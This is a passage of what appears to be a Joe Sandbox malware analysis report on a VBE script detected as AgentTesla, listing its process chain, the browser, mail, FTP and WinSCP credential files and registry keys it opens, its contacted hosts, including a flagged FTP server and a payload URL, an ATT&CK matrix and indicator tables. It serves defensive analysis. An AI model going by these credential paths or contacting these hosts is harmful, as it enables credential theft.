          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: Yara matchFile source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected AgentTesla
          Source: Yara matchFile source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_010E4A7A bind,17_2_010E4A7A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_010E4A55 bind,17_2_010E4A55

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts211
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		2
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Exfiltration Over Alternative Protocol          		2
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts11
          Scripting          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          Credentials in Registry          		115
          System Information Discovery          		Remote Desktop Protocol2
          Data from Local System          		Exfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts21
          Command and Scripting Interpreter          		Logon Script (Windows)11
          Process Injection          		11
          Scripting          		Security Account Manager421
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration1
          Non-Standard Port          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell          		Logon Script (Mac)Logon Script (Mac)1
          Obfuscated Files or Information          		NTDS1
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets351
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size Limits23
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Masquerading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items351
          Virtualization/Sandbox Evasion          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Access Token Manipulation          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755441 Sample: PO-08784 xlsx.vbe Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 35 ftp.mcmprint.net 2->35 37 b3solutionscws.com 2->37 39 2 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 63 Wscript starts Powershell (via cmd or directly) 9->63 65 Obfuscated command line found 9->65 67 Very long command line found 9->67 12 powershell.exe 25 9->12         started        16 cmd.exe 1 9->16         started        process6 file7 33 C:\Users\user\AppData\...\3uneeqsg.cmdline, Unicode 12->33 dropped 69 Tries to detect Any.run 12->69 71 Hides threads from debuggers 12->71 18 CasPol.exe 15 12 12->18         started        22 csc.exe 3 12->22         started        25 conhost.exe 12->25         started        27 conhost.exe 16->27         started        signatures8 process9 dnsIp10 41 ftp.mcmprint.net 185.31.121.136, 21, 49807, 49808 RAX-ASBG Bulgaria 18->41 43 b3solutionscws.com 192.185.145.188, 49803, 80 UNIFIEDLAYER-AS-1US United States 18->43 45 api.ipify.org.herokudns.com 54.91.59.199, 443, 49805 AMAZON-AESUS United States 18->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->57 59 Tries to steal Mail credentials (via file / registry access) 18->59 61 5 other signatures 18->61 31 C:\Users\user\AppData\Local\...\3uneeqsg.dll, PE32 22->31 dropped 29 cvtres.exe 1 22->29         started        file11 signatures12 process13

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO-08784 xlsx.vbe2%VirustotalBrowse
          PO-08784 xlsx.vbe2%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          api.ipify.org.herokudns.com0%VirustotalBrowse
          ftp.mcmprint.net10%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb0%Avira URL Cloudsafe
          http://oqyPj4HORVpk3nSGGk.net0%Avira URL Cloudsafe
          http://kmbImL.com0%Avira URL Cloudsafe
          http://pesterbdd.com/images/Pester.png100%Avira URL Cloudmalware
          http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
          http://oqyPj4HORVpk3nSGGk.netXy0%Avira URL Cloudsafe
          https://api.ipify.orgftp://ftp.mcmprint.netklogz0%Avira URL Cloudsafe
          https://contoso.com/0%Avira URL Cloudsafe
          https://contoso.com/License0%Avira URL Cloudsafe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%Avira URL Cloudsafe
          http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%Avira URL Cloudsafe
          https://contoso.com/Icon0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          api.ipify.org.herokudns.com
          		54.91.59.199
          		truefalseunknown
          ftp.mcmprint.net
          		185.31.121.136
          		truetrueunknown
          b3solutionscws.com
          		192.185.145.188
          		truefalse
            		unknown
            api.ipify.org
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://api.ipify.org/false
                		high
                http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfbfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://kmbImL.comCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://127.0.0.1:HTTP/1.1CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		low
                http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://api.ipify.orgCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://oqyPj4HORVpk3nSGGk.netCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://oqyPj4HORVpk3nSGGk.netXyCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://api.ipify.orgftp://ftp.mcmprint.netklogzCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/Licensepowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://DynDns.comDynDNSnamejidpasswordPsi/PsiCasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://contoso.com/Iconpowershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              54.91.59.199
                              		api.ipify.org.herokudns.comUnited States
                              		14618AMAZON-AESUSfalse
                              192.185.145.188
                              		b3solutionscws.comUnited States
                              		46606UNIFIEDLAYER-AS-1USfalse
                              185.31.121.136
                              		ftp.mcmprint.netBulgaria
                              		199364RAX-ASBGtrue

                              General Information

                              Joe Sandbox Version:36.0.0 Rainbow Opal
                              Analysis ID:755441
                              Start date and time:2022-11-28 18:09:14 +01:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 17m 46s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:PO-08784 xlsx.vbe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                              Run name:Suspected Instruction Hammering
                              Number of analysed new started processes analysed:22
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 99%
                              • Number of executed functions: 358
                              • Number of non-executed functions: 14
                              Cookbook Comments:
                              • Found application associated with file extension: .vbe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 52.242.97.97, 40.125.122.151
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              54.91.59.1998dnOOS7Lby.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              OIVv97kaO5.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              library.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              XIiRHEaA9R.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              gf3YTNoH1Q.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              DHL Special Clearance Fees 01012022_sg.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              Documento contrattuale 22201008 Spec22201009.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              na.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              ConsoleApp8.exeGet hashmaliciousBrowse
                              • api.ipify.org/
                              if.bin.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              D1768Y2157.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              gSbSxwWtqG.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              gPZ7cR9v89.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              mixshop_20211229-065147.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              iff.bin.dllGet hashmaliciousBrowse
                              • api.ipify.org/
                              SecuriteInfo.com.Heur.31820.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              229C7DF4.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              0617_1876522156924.docGet hashmaliciousBrowse
                              • api.ipify.org/
                              Whrw7Kmlni.exeGet hashmaliciousBrowse
                              • api.ipify.org/?format=xml
                              gelfor.dllGet hashmaliciousBrowse
                              • api.ipify.org/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              api.ipify.org.herokudns.comKWIR000714988.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              Attach Qoute.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              SWIFT Payment W076001.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              file.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                              • 52.20.78.240
                              094089010-094098574-1669343495-1669343493-2332.htmlGet hashmaliciousBrowse
                              • 52.20.78.240
                              INV and NOA.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              ORDERFT-PO-0276-22 & PO pdf.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              SAP_RFQ-22-QAI-OPS-0067.Docx.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              SecuriteInfo.com.Win32.PWSX-gen.543.5711.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              PO-IB5708.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              FedEx Express AWB#53053232097Receipt.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              094089010-094098574-1669343495-1669343493-2332.htmlGet hashmaliciousBrowse
                              • 54.91.59.199
                              VHE220012A.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              #U0e02#U0e2d#U0e43#U0e1a#U0e40#U0e2a#U0e19#U0e2d#U0e23#U0e32#U0e04#U0e32.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              swYA5v1F5o.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              DHLDOCUMENTS27011222.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              Y06bwSO4Jy.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              Halkbank.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              SecuriteInfo.com.Win32.PWSX-gen.8427.25662.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              ftp.mcmprint.netOrdine n.47201 pdf.vbsGet hashmaliciousBrowse
                              • 185.31.121.136
                              Richiesta urgente.vbsGet hashmaliciousBrowse
                              • 185.31.121.136
                              Payment advis pdf.scr.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              ordine C220205 pdf.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              PO#0192 xls.vbsGet hashmaliciousBrowse
                              • 185.31.121.136
                              ANGEBOTSANFRAGEN.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              SecuriteInfo.com.Trojan.NSIS.Agent.21226.9113.exeGet hashmaliciousBrowse
                              • 185.31.121.136
                              Jtkmmbl.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              DOC85945003805010 PDF.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              RFQ NO # 577131022.pif.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              PO-57064.scr.exeGet hashmaliciousBrowse
                              • 185.31.121.80
                              INQUIRY- EUSQ131302.scr.exeGet hashmaliciousBrowse
                              • 185.31.121.80

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              AMAZON-AESUShttps://indd.adobe.com/view/afe6bfe7-4ef8-49fa-b099-03bbf908dd26Get hashmaliciousBrowse
                              • 52.55.120.73
                              KWIR000714988.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              http://sunto.comGet hashmaliciousBrowse
                              • 3.85.151.250
                              http://saylor2xbtc.comGet hashmaliciousBrowse
                              • 54.157.29.40
                              https://whores-near-you.com/n185Get hashmaliciousBrowse
                              • 52.1.220.62
                              Attach Qoute.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              SWIFT Payment W076001.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              https://www.degussa-bank.de/c/blogs/find_entry?p_1_id=0&noSuchEntryRedirect=https://www.sba.gov///www.iedcolombiaaprende.edu.co/doc/Get hashmaliciousBrowse
                              • 52.3.49.254
                              Yw0HhtLWAz.elfGet hashmaliciousBrowse
                              • 3.238.49.167
                              file.exeGet hashmaliciousBrowse
                              • 3.220.57.224
                              Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                              • 52.20.78.240
                              Mddos.arm7.elfGet hashmaliciousBrowse
                              • 44.201.61.247
                              https://zpr.io/3C7L92FR2mktGet hashmaliciousBrowse
                              • 52.6.99.193
                              094089010-094098574-1669343495-1669343493-2332.htmlGet hashmaliciousBrowse
                              • 52.20.78.240
                              INV and NOA.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              ORDERFT-PO-0276-22 & PO pdf.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              SAP_RFQ-22-QAI-OPS-0067.Docx.exeGet hashmaliciousBrowse
                              • 52.20.78.240
                              SecuriteInfo.com.Win32.PWSX-gen.543.5711.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              PO-IB5708.exeGet hashmaliciousBrowse
                              • 3.232.242.170
                              FedEx Express AWB#53053232097Receipt.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              UNIFIEDLAYER-AS-1USConfirmation transfer Copy AGS 22-0035.xlsGet hashmaliciousBrowse
                              • 69.49.245.57
                              Pago.xlsGet hashmaliciousBrowse
                              • 192.185.113.96
                              Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                              • 162.240.62.179
                              SHIPPING DOC.exeGet hashmaliciousBrowse
                              • 50.87.139.143
                              RFQ 8525-22.exeGet hashmaliciousBrowse
                              • 192.185.90.105
                              https://mail.jaytellis.com/blog/?i=i&0=dgss@seg-social.ptGet hashmaliciousBrowse
                              • 192.254.190.158
                              NEW PURCHASE ORDER_PDF.exeGet hashmaliciousBrowse
                              • 162.241.194.178
                              Richiesta urgente.vbsGet hashmaliciousBrowse
                              • 162.240.62.179
                              Lakeringernes (1).exeGet hashmaliciousBrowse
                              • 50.87.192.144
                              Vendor Master form.exeGet hashmaliciousBrowse
                              • 50.87.139.143
                              Urgent quote request -pdf-.jsGet hashmaliciousBrowse
                              • 162.241.123.11
                              9umWLvLL9p.exeGet hashmaliciousBrowse
                              • 50.87.249.47
                              bfBERETDmj.exeGet hashmaliciousBrowse
                              • 108.167.143.196
                              pX2iKwDkVe.exeGet hashmaliciousBrowse
                              • 192.185.150.20
                              SecuriteInfo.com.Win32.PWSX-gen.24831.19780.exeGet hashmaliciousBrowse
                              • 192.185.48.122
                              boat.x86.elfGet hashmaliciousBrowse
                              • 74.91.232.63
                              Estado de cuenta.xlsGet hashmaliciousBrowse
                              • 192.185.113.96
                              H32Mnb3sB8.exeGet hashmaliciousBrowse
                              • 192.185.150.20
                              41052D6A6B62BDA012DBFD2C47B00943BFE395745917E.exeGet hashmaliciousBrowse
                              • 192.185.104.204
                              https://t.co/EZE5v2LOAzGet hashmaliciousBrowse
                              • 192.185.48.170

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eKWIR000714988.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              file.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              Attach Qoute.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              PO.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              SWIFT Payment W076001.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              Carta de pago.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              file.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              Ordine n.47201 pdf.vbsGet hashmaliciousBrowse
                              • 54.91.59.199
                              vbc.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              Ransomware.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              INV and NOA.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              ORDERFT-PO-0276-22 & PO pdf.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              SAP_RFQ-22-QAI-OPS-0067.Docx.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              SecuriteInfo.com.Win32.PWSX-gen.543.5711.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              INVOICE SHIPPING-PACKING LIST.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              PO-IB5708.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              FedEx Express AWB#53053232097Receipt.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              SHIPPING INVOICE-PACKING LIST DOCS.exeGet hashmaliciousBrowse
                              • 54.91.59.199
                              IMG_202202811-0443.vbsGet hashmaliciousBrowse
                              • 54.91.59.199
                              VHE220012A.exeGet hashmaliciousBrowse
                              • 54.91.59.199

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8003
                              Entropy (8bit):4.841989710132343
                              Encrypted:false
                              SSDEEP:192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
                              MD5:677C4E3A07935751EA3B092A5E23232F
                              SHA1:0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
                              SHA-256:D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
                              SHA-512:253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
                              Malicious:false
                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                              C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs

                              Download File
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
